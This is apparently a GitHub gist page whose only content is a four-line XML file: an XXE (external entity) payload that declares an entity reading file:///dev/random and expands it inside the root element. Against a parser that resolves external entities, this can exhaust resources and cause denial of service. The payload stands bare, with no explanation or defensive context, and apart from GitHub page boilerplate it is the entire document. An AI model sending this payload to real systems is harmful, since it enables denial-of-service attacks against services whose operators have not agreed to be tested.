Created
October 8, 2018 18:45
-
-
Save Paul776/75b4809570dc7df1ade478b19accbbc9 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment